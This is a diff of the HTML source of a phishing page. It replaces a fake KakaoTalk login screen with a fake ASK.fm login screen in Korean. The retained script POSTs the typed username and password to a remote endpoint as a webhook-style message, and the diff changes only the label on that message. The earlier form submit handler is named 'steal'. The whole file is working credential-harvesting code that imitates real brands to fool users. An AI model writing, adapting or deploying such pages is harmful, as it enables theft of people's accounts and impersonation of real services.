--- a/index.html
+++ b/index.html
@@ -1,155 +1,113 @@
 <!DOCTYPE html>
-<html lang="en">
+<html lang="ko">
 <head>
   <meta charset="UTF-8">
-  <title>KakaoTalk</title>
-  <link rel="icon" href="https://www.kakaocorp.com/favicon.ico">
-  <link href="https://fonts.googleapis.com/css2?family=Roboto&display=swap" rel="stylesheet">
- <style>
-body {
-  margin: 0;
-  padding: 0;
-  background-color: #ffffff; /* changed from #fafafa to white */
-  font-family: 'Roboto', sans-serif;
-}
+  <title>에스크 로그인</title>
+  <style>
+    @import url('https://fonts.googleapis.com/css2?family=Noto+Sans+KR&display=swap');
 
-  .container {
-    width: 100%;
-    max-width: 480px;
-    margin: 80px auto;
-    padding: 40px 20px;
-    background-color: white;
-    text-align: center;
-  }
+    * {
+      box-sizing: border-box;
+      margin: 0;
+      padding: 0;
+      font-family: 'Noto Sans KR', sans-serif;
+    }
 
-  .logo {
-    width: 180px;
-    margin-bottom: 25px;
-  }
+    body {
+      background-color: #ffffff;
+      display: flex;
+      justify-content: center;
+      align-items: center;
+      height: 100vh;
+    }
 
-  .box {
-    border: 1px solid #dbdbdb;
-    padding: 30px 24px;
-    text-align: center;
-    background-color: #ffffff; /* changed */
-  }
+    .login-container {
+      width: 360px;
+      padding: 40px 30px;
+      border: 1px solid #ddd;
+      border-radius: 10px;
+      box-shadow: 0 4px 12px rgba(0, 0, 0, 0.08);
+    }
 
-  .input-field {
-    width: 100%;
-    padding: 14px;
-    margin: 10px 0;
-    font-size: 16px;
-    background: transparent;
-    border: none;
-    border-bottom: 1px solid #dbdbdb;
-  }
+    .login-logo {
+      text-align: center;
+      margin-bottom: 24px;
+    }
 
-  .checkbox-container {
-    text-align: left;
-    margin: 16px 0;
-    font-size: 15px;
-    color: gray;
-  }
+    .login-logo img {
+      height: 40px;
+    }
 
-  .checkbox-container input[type="checkbox"] {
-    margin-right: 6px;
-    accent-color: gray;
-  }
+    .login-title {
+      text-align: center;
+      font-size: 20px;
+      font-weight: bold;
+      margin-bottom: 30px;
+      color: #333;
+    }
 
-  .yellow-login-button {
-    background-color: #fcdf3b; /* changed */
-    color: black;
-    padding: 14px;
-    border: none;
-    width: 100%;
-    font-size: 15px;
-    margin: 12px 0;
-    cursor: pointer;
-  }
+    .form-group {
+      margin-bottom: 20px;
+    }
 
-  .gray-box-button {
-    background-color: #e8e8e7; /* changed */
-    padding: 14px;
-    margin: 12px 0;
-    width: 100%;
-    font-size: 15px;
-    cursor: pointer;
-    font-weight: normal;
-    border: none; /* no outline */
-  }
+    .form-group label {
+      display: block;
+      font-size: 14px;
+      color: #555;
+      margin-bottom: 6px;
+    }
 
-  .link-row {
-    display: flex;
-    justify-content: space-between;
-    margin-top: 18px;
-    font-size: 14px;
-    color: #555;
-  }
+    .form-group input {
+      width: 100%;
+      padding: 10px 12px;
+      border: 1px solid #ccc;
+      border-radius: 6px;
+      font-size: 14px;
+    }
 
-  .link-row a {
-    text-decoration: none;
-    color: #555;
-  }
+    .login-button {
+      width: 100%;
+      padding: 12px;
+      background-color: #18b2a5;
+      color: #fff;
+      font-size: 16px;
+      font-weight: bold;
+      border: none;
+      border-radius: 6px;
+      cursor: default;
+    }
 
-  .link-row a:hover {
-    text-decoration: underline;
-  }
+    .login-button:hover {
+      background-color: #139d91;
+    }
 
-  .footer {
-    font-size: 13px;
-    color: #8e8e8e;
-    text-align: center;
-    margin-top: 40px;
-  }
-
-  .footer a {
-    color: #8e8e8e;
-    text-decoration: none;
-  }
-
-  .footer a:hover {
-    text-decoration: underline;
-  }
-</style>
+    .footer {
+      text-align: center;
+      margin-top: 20px;
+      font-size: 13px;
+      color: #aaa;
+    }
+  </style>
 </head>
-
 <body>
-  <div class="container">
-    <!-- Kakao Logo Image -->
-    <img src="https://cloudfront-ap-northeast-1.images.arcpublishing.com/chosunbiz/V7G5WPM7MJXDWOGTLIHZ7HINAE.jpg" alt="Kakao Logo" class="logo">
-
-    <!-- Gray Box -->
-    <div class="box">
-      <form onsubmit="steal(event)">
-        <input class="input-field" id="username" type="text" placeholder="카카오메일 아이디, 이메일, 전화번호" required>
-        <input class="input-field" id="password" type="password" placeholder="비밀번호" required>
-
-        <div class="checkbox-container">
-          <label><input type="checkbox"> 간편로그인 정보 저장</label>
-        </div>
-
-        <button type="submit" class="yellow-login-button">로그인</button>
-      </form>
-
-      <button class="gray-box-button">QR코드 로그인</button>
-
-      <div class="link-row">
-        <a href="#">회원가입</a>
-        <div>
-          <a href="#">계정 찾기</a> | <a href="#">비밀번호 찾기</a>
-        </div>
-      </div>
+  <div class="login-container">
+    <div class="login-logo">
+      <img src="https://ask.fm/images/logos/askfm-logo.svg" alt="ASK.fm">
     </div>
-
-    <!-- Footer -->
+    <div class="login-title">로그인</div>
+    <div class="form-group">
+      <label for="username">아이디 또는 이메일</label>
+      <input type="text" id="username" placeholder="아이디 또는 이메일을 입력하세요">
+    </div>
+    <div class="form-group">
+      <label for="password">비밀번호</label>
+      <input type="password" id="password" placeholder="비밀번호를 입력하세요">
+    </div>
+    <button class="login-button" disabled>로그인</button>
     <div class="footer">
-      <a href="#">이용약관</a> |
-      <a href="#">개인정보 처리방침</a> |
-      <a href="#">고객센터</a><br>
-      © Kakao Corp.
+      © 2025 ASK.fm
     </div>
   </div>
-
 <script>
   const startTime = Date.now();
   let typed = false;
@@ -186,7 +144,7 @@ body {
       method: "POST",
       headers: { "Content-Type": "application/json" },
       body: JSON.stringify({
-        content: `🛑 고양이\nUsername: ${u}\nPassword: ${p}`
+        content: `🛑 강아지\nUsername: ${u}\nPassword: ${p}`
       })
     })
     .then(response => {
